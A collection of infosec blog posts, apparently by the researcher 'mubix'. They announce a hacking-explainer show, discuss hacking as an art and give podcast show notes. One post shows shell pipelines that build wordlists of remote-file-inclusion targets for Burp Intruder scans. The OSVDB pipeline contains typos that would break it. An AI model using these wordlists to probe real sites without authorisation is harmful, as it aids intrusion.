Practical Exploitation is going to be me, explaining things in the way that I see the world on the best medium for what I'm explaining, be it a short blog blurb, a video of me, a video of a desktop, or just audio. There is no schedule that I'll be sticking to, but I will guarantee you 3 things though:

1. If you want it explained and it has to do with infosec or hacking (I'll do my best on the hardware side), it will be on the show. Be it a white paper that you don't have time or want to decrypt, a tool you can't figure out, or just something you want to learn more in-depth. That's what it's for.
2. No fluff, I'll get straight to how you use it or can understand the topic.
3. If your bullshit flag goes up for even an instant, call me on it, and I'll either explain why I said what I did, or apologize and correct myself. You can email, tweet, PM, IM, ask a question on the tumblr site, or just haul up and punch me at a con. Either way, please take the time to tell me I'm wrong and why.

It launches today. I'll start with topics that I know cold, I'll move on to white papers that I thought were interesting but haven't read yet, hopefully intermingling in anything you want to learn about.

http://www.practicalexploitation.com/

and email: questions at the same domain.

or call:  (503) 406-8249

-- mubix

P.S.  Room362.com and Mubix Links aren't going anywhere. If anything they will probably start getting updated more. Room362 with stuff I cook up, as always, and Mubix Links with anything I find interesting on the web. 

First of all, get Robert @RSnake Hansen’s RFI list here:

http://ha.ckers.org/blog/20100129/large-list-of-rfis-1000/

it’s a great list, but as soon as I saw it, I was like.. hmm.. how can I use that? Well, being that I am a Burp fan, I parsed the .dat with the following line:

cat rfi-locations.dat | grep -v "^#" | awk -F '?' '{print $1}' | sort -u > rsnake_list.txt

This pulls his list down to 906 entries which you can load in to Burp and hammer away with Intruder. If it pops any of them, not only have you better identified what is running on the site, but you might have just found RFI.

But I wanted to take this a step further:

The OSVDB archive allows you to download their entire database of vulnerabilities (after signing up for an account). I downloaded the CSV version so that I could parse it similar to how I did RSnakes. However, it definitely wasn’t that easy.

I downloaded osvd-csv.latest.tar.gz, extracted it and ran the following:

cat * | grep -i "remote file inclusion" | grep -v "\,0$" | awk -F "," '{print $13}' | sed ‘s/^\”//’ | set ‘s/\”$//’ | sort –u > osvdb_rfi.txt

Which got me close. About 3 hours of manual editing after that and I had another list of ~1750 possible remote file inclusions. Is this a full proof way of getting every possibility from the database? Definitely not, but it’s close, and I’d love to see some one modify and tweak my bash line to get it even closer. (Or find a completely different way)

Update on Monday, February 1, 2010 at 9:17AM by Rob Fuller

RSnake has updated his list, same link, same file name with about 2300 RFIs now.

This is far from a new idea, however it’s not something that is easily provable. So I had an idea this morning. I posed the following question on Twitter:

You know what I got in return? a resounding “No” from everyone. (well I had one outlier but, who doesn’t when you are trying to apply science to prove art) I challenge you to name another non-artistic career that people are so passionate about that they would stay in it even if they won the lottery.

Here are a few that I would like to highlight:

@schuetzdj

@TomSellers

@ethicalhack3r

@dookie2000ca

This was a somewhat surprising outcome. See a trend? Most people wanted to quit their jobs, and start their own infosec company. Why is this? Is it just “The American Dream” or is it because they are unhappy with the current people in leadership? Or is it simply the fact that they are hindered from actually pursuing and learning hacking/security at work? The world may never know, but I do implore firms to look at the retention rate of their _actual_ talent. (No, I don’t buy into the No Infosec Peep left behind bull).

There is a rumor that Google has a practice. 2 hours a day, you (an employee of Google) are REQUIRED to work on a project of your own, that is in no way indebted or owned by Google, even after completion. I can imagine the above answers would change if that were the case where they worked. If their employers fostered learning.

As a result of Infosec / Hacking being an art, do we have our premadonas? Of course. But do we also have our Van Gogh's and Michelangelo's? Definitely.

But, time for a bit of a reality check:

@daveshackleford

Ya, you have NO idea what you would really do with millions of instant cash. I think the number is some 80% of lottery winners go BANKRUPT in the first 10 years. This is because you, and EVERYONE you have ANY connection to, goes absolutely crazy. To the point that there are lottery winner support groups.

However, the fact that people say it now, shows that they at least have the passion for the art. (or are just fronting)

Here some honest answers to even out the tide:

@shmoosr

@Bolster

@andrewsmhay

In conclusion, I believe that hacking is a science, until passion adds the artistic fire to the mix. At least that’s what I think, draw your own conclusions.

(That’s another thing I love about this field, you are constantly challenged to draw your own conclusions, to think, to learn, to improve, to be… better)

I was recently on the grmn00bs podcast, I had a great time, and I can't wait to see who they pick up next on their series:

grmn00bs podcast: episode 9

"When they were n00bs Series"

Show Notes:

hak5 is one of the original security shows. Rob has been featured on several segments.
Twit Netcast Network with Leo Laporte is another show that’s been around for a while.
Security Tube is the Youtube of security videos. This is where I’m at when I should be working. You might even find some GRM n00bs stuff rattling around there.
The Academy Pro is another excellent place to go for security training.
milw0rm has lots of exploits. It’s a good place to check out some old papers to brush up on security history.
NewOrder is another resource to get abreast of lessons learned in the past.
Jasager is the “Yes Man” Rob talks about in the show.
Chris Gates’s book list has some good ideas for security reading.
Syngress is a publisher of security texts. They have all my money.
Donate to Johnny Long.

If you hadn't noticed, LinkedIn has started allowing you to link your Twitter account to your LinkedIn account. So, I didn't know this (since I opted out), but apparently LinkedIn will kick your status updates to Twitter... like when you get a new job...

Privacy settings out the window! Woohoo for Web 2.0!